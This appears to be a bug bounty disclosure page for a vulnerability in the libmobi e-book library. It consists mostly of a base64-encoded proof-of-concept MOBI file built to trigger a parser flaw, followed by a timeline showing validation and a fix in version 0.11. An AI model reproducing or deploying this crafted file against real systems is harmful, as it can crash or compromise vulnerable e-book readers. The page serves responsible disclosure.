AAAAAAAAAAAAAAAAAAAAAAAeAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAFgAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACVAAAAAAAAAAAAAIAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADRAAAAAAA7AAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAADcAAAAAAAAAABMAAAAAADkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAggAAAAAAAAAAAAA/ AAAAAAAAzwAADAAAAAAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAN0AAAAAAAAAAAAAAAAAAAAAAACh AAAAjAAAAAAAAAA+AAAAAAAAAAAAAAAAAAAAAAAAAAB4AEcAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL4AAAAAAAAAAAAAAA4AAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAFUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAO8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAADcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA AAAAAAAAAAAAAAAfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQAAAAAAAAA AAAAAAAAAN8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAD8AAAAAAAAALMAAAAAAAAAcwAAAAAAAAAAAAAAAAAAAJ8AAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsA AAANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOcAAAAAAAAAAFAA AAAAAAAAAAAAAAAAAAAAyQAAAAAAAADlAAAAAAAASQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC6AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwgAAAAAAAAAAAAAAAAAA AAAASgAAADQAAAAAAAAAADEAAHcAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ALYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAACh/wAAAAAAADMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqgAAAAAAAAAAHQAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAANwAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAFUAXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACFAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAO4AAAAAAAAAAAAAAAAAAAAAAADNAAAAAAAAAACmAAAAAAAAAAAAAAAA AAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0AAAAAAAAAAAAAAAAAAAApAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPsAAAAAAAAAAAAA7gAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAM4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAABa/wAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABkAxwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAF8AAAAAAAAAAAAAAAAAAAAAAAAAAPoAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAACxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALoAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATwAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACn AAAAAAAAAAAAAAAAAAAAAADwAAAAAAAA2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAE4AAAAAAAAAAAAAAAAAAB8AAAAAfgAAAAAAAG8AAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAApwAAAAAAAAAAAAAAAAAA9AAAAAAAAAAAAAAA4AAAAAAAAAALAAAA AAAAAAAAtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlwAAhAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAPAAAAABJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAABiAAAAADsAAAAAAAAAAAAAAAAAAAC6AAAAAAAAAAAAAAAAAAChAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfQBpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFUAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAUwAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiwAAAAAAABoAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAuAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA AAAAAO0AAMwAAIMAAAAAABgAAAAAAAA1UwDGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAA AAAAAAA8P3htbPZlcnNpb249IjEuMCLlbmNvZGluZz0idXRmLTgiPz48IURPQ1RZUEXodIF4UFVC TElDICJ9Ly9XM0MvL0RU8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz 8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz 8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8///Ij5UZXN042hhcHRlciAxgfAxgqBwgdMygPxwYWdlgOFw g3iJV4lXiVeJV4lXiVeJV4lXiVeJBolXiVeJV4lXiVeLL4lXiVeJV4lXiVeJV1VHSYlviW+JbIDw idiJgzKJh4IEiZ+JmID4iZ+SWZLvku+S75Lvz++S75Lvku+S75Lvku+S75Lvku+Ux5Lvku+S75Lv ku+SElQxNJMPkw8yIJPZc2lnaWxfdG9jX2lkXzEigZ+TzXN1YopmLZPxMpP3gtmUF5QQM5QTgueC 5zKC5zQzgueC541RgueFujSW92UgNJbxCgCGhQSESU5EWAAAAMAAAAAiwAAAAAAAAAIAAADwAAAA AQAA/en/////AAAAAwAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAC3AAAAAJEAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD2AAAAAAAAAAAAAAAAAAAAAAAA5gAAAAAAAACAVEFHWAAA ACAAAAABAgEBAAcBAwAEAQQABgIIAAAAAAEKMDAwMDAwMDgzMwADAAAASURYVADgAABJTkRYAAAA wAAAAAAAAAABAAAAAAAAAPQAAAAD//////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ0AAAAAAAAXAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAKMDAwMDAwMDIyNA+AgICAvAowNTAwMDAwNTI1D5BcgYDCCjAwMDAwMDA4 MzMPo4KCgAG5SURYVADAANEA4gAAj1AtLy8qW0BhaWQ9ADAnXZJQLS8vKltAYWlkPSdVR0kwJ100 UC1hLypbQGFpZD0nMVQxNDAnXQpJTkRYAAAAwAAAAAAAAAAAAAAAAgDxAOwAAAABAAD96f////8A AAADAAAAAAAAAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAAAAAABUQUdYAAAAGAAAAAEBAQMA BgIMAAAAAAEOU0tFTDAwMDAwMDAwMDIAAwAAAElEWFQA2AAASU5EWAAAAMAAAAAAAAAAAQAAAAAA AAEMAAAAA///////////AAAAAAAAAAAAAAAAAABzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1AAAAALUA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA DlNLRUwwMDAwMDAwiDAwCoGBgAHugAHuDlNLRUwwMDAwMDAwMDAxCoGBAqoB8QKqAfEOU0tFTDAw MDAwMDAwMDIKgYEE3QHyBN0B8klEWFQAwADYAPIAAElORFgAAADAAAAAAAAAAAAAAAB/AAAA9AAA AAEAAP3p/////wAAAAQAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAGAACdAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAAFRBR1gA AAAwAAAAAQEBAQACAQIAAwEEAAQBCAAVARAAFgEgABcsQAAGAoAAAAAAAQEzAARJRFhUAPAAAElO RFgAAADAAAAAAAAAAAEAAAAAAAAA8AAAAAT//////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAtgAAAAAAAADaAAAAAAAAAAAAAAAAAAAAygAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAABTAAAAAAAAAAAAAAAAAAHSjwHSAqqAgICAATHvA/wEjEyAgoOBgAEynwbC3J6BgYKBATOf B57qsoGBgt0AAElEWFQAwADLANgA445UZXN0IGNoYXB0ZXIgMY5UZXN0IGNoYXB0ZXIgMpNUZXN0 IHN1YmNoYXB0ZXIgMi3Vk1Rlc3Qgc3ViY2hhcHRlciAyLTIAAEZMSVMAvQAIAEEAAAAAAAD///// AAEAAwAAAAMAAAAB//+T/0ZDSVMAAAAUAAAAEAAAAAIAAAAAAAAECAAAAAAAAAAoAAC6AAAAACgA AAAIAAEqAQAAAABEQVRQAAAADQEEAAICAAByvgAAAAB4AAJWAQAA6Y4NCg==

Impact

Affected version public 395dbde.

We are processing your report and will contact the bfabiszewski/libmobi team within 24 hours. 2 years ago
We have contacted a member of the bfabiszewski/libmobi team and are waiting to hear back 2 years ago
We have sent a follow up to the bfabiszewski/libmobi team. We will try again in 7 days. 2 years ago
Bartek Fabiszewski validated this vulnerability 2 years ago
jimoyong has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Bartek Fabiszewski marked this as fixed in 0.11 with commit ce0ab6 2 years ago
Bartek Fabiszewski has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation